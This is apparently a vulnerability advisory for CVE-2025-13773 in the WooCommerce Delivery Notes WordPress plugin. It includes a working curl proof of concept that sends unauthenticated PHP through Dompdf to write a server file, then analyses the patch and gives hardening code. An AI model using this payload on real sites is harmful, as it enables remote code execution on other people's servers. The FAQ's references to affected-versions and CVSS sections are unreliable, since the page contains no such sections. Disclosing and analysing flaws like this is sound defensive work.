SECURITY ADVISORY / 01

CVE-2025-13773 Exploit & Vulnerability Analysis

Complete CVE-2025-13773 security advisory with proof of concept (PoC), exploit details, and patch analysis.

Patch diff: woocommerce-delivery-notes

The Exploit

An unauthenticated attacker can force the plugin to render attacker-supplied HTML through Dompdf with PHP evaluation enabled.

curl -sS -X POST "http://TARGET/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode 'action=wcdn_update' \
  --data-urlencode 'order_id=123' \
  --data-urlencode 'template=<html><body><?php file_put_contents(ABSPATH."wp-content/uploads/pwned.txt","pwned"); ?></body></html>'

curl -sS "http://TARGET/wp-content/uploads/pwned.txt"

The POST request is accepted by the plugin's update handler without any authentication, and the injected <?php ... ?> fragment is evaluated on the server when Dompdf renders the HTML. The second request confirms the exploit by retrieving the file that the injected PHP wrote to the WordPress uploads path.

What the Patch Did

Before:

$options->set( 'isPhpEnabled', true );

After:

$options->set( 'isPhpEnabled', false );

The patch disables Dompdf's PHP execution feature using the Dompdf option isPhpEnabled. This prevents any PHP code embedded in the HTML passed to Dompdf from being evaluated during PDF rendering.

Root Cause

This is a code injection / remote code execution bug (CWE-95) where attacker-controlled HTML reaches Dompdf with PHP execution switched on. The plugin accepted a template or delivery-note payload in WooCommerce_Delivery_Notes::update, then fed it into Dompdf via includes/front/wcdn-front-function.php. Because isPhpEnabled was set to true, <?php ... ?> fragments in the rendered HTML were evaluated instead of being treated as inert text.

Why It Works

The only load-bearing change is the switch from true to false for isPhpEnabled. If Dompdf remains configured to allow PHP, injected PHP tags will still execute in the rendering engine. The rest of the Dompdf setup is just plumbing; disabling PHP evaluation is what closes the sink. Any additional security controls would be defense-in-depth, but the exploit hinges on this line.

Hardening Checklist

  • Add a capability check such as current_user_can('manage_woocommerce') in update callbacks before processing template data.
  • Protect state-changing requests with wp_verify_nonce() on AJAX or admin-post actions.
  • Escape user-controlled values before injecting them into HTML templates using esc_html(), esc_attr(), or wp_kses_post().
  • Keep Dompdf safe by disabling PHP execution: $options->set('isPhpEnabled', false);
  • Register admin-only operations on admin_post_{action} / wp_ajax_{action} hooks only (not the nopriv variants) and reject unauthenticated requests.
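Putting the checklist together, the following is an added example (not the plugin's own code) of a hardened handler for the wcdn_update action seen in the PoC: it is registered only for logged-in users, verifies a nonce and capability, reduces the template to the wp_kses_post() subset, and renders with PHP evaluation off. It assumes the Dompdf library is autoloaded and that the admin page issuing the request emits a nonce for the action 'wcdn_update'; the function name is this example's own.

```php
<?php
// Added example, not the plugin's code. Assumes Dompdf is autoloaded and
// that the triggering page emits wp_create_nonce( 'wcdn_update' ).

use Dompdf\Dompdf;
use Dompdf\Options;

// Register on wp_ajax_{action} only. There is deliberately no
// wp_ajax_nopriv_ registration, so logged-out callers never reach the handler.
add_action( 'wp_ajax_wcdn_update', 'wcdn_example_handle_update' );

function wcdn_example_handle_update() {
    // 1. CSRF: stop unless the request carries a valid nonce for this action.
    check_ajax_referer( 'wcdn_update', '_wpnonce' );

    // 2. Authorization: updating delivery-note templates is a store-management task.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input handling: the order id must be a positive integer, and the template
    //    is reduced to post-safe HTML. wp_kses_post() drops <?php ... ?> fragments
    //    and <script> elements because they are not allowed tags.
    $order_id = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
    $template = isset( $_POST['template'] ) ? wp_kses_post( wp_unslash( $_POST['template'] ) ) : '';
    if ( 0 === $order_id || '' === $template ) {
        wp_send_json_error( array( 'message' => 'bad request' ), 400 );
    }

    // 4. Sink: render with PHP evaluation switched off (the change the patch made),
    //    so even a fragment that survived filtering is treated as inert text.
    //    Remote asset loading is also off to keep the renderer from fetching URLs.
    $options = new Options();
    $options->set( 'isPhpEnabled', false );
    $options->set( 'isRemoteEnabled', false );

    $dompdf = new Dompdf( $options );
    $dompdf->loadHtml( $template );
    $dompdf->render();

    wp_send_json_success( array(
        'order_id' => $order_id,
        'bytes'    => strlen( $dompdf->output() ),
    ) );
}
```

The nonce and capability checks stop the unauthenticated POST from the PoC before any template is processed; the isPhpEnabled setting is the layer that matters if every earlier check is bypassed.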

References

  • https://nvd.nist.gov/vuln/detail/CVE-2025-13773

Frequently asked questions about CVE-2025-13773

What is CVE-2025-13773?

CVE-2025-13773 is a code injection / remote code execution vulnerability (CWE-95) in the WooCommerce Delivery Notes WordPress plugin: attacker-supplied HTML reaches Dompdf while its isPhpEnabled option is true, so embedded PHP is evaluated during PDF rendering. This security advisory provides detailed technical analysis of the vulnerability, exploit methodology, affected versions, and complete remediation guidance.

Is there a PoC (proof of concept) for CVE-2025-13773?

Yes. This writeup includes proof-of-concept details and a technical exploit breakdown for CVE-2025-13773. Review the analysis sections above for the PoC walkthrough and code examples.

How does CVE-2025-13773 get exploited?

The technical analysis section explains the vulnerability mechanics, attack vectors, and exploitation methodology. PatchLeaks publishes this information for defensive and educational purposes.

What products and versions are affected by CVE-2025-13773?

Check the affected-versions section of this advisory for specific version ranges, vulnerable configurations, and compatibility information.

How do I fix or patch CVE-2025-13773?

The patch analysis section provides guidance on updating to patched versions, applying workarounds, and implementing compensating controls.

What is the CVSS score for CVE-2025-13773?

The severity rating and CVSS scoring for CVE-2025-13773 are documented in the vulnerability details section. Refer to the NVD entry for the current authoritative score.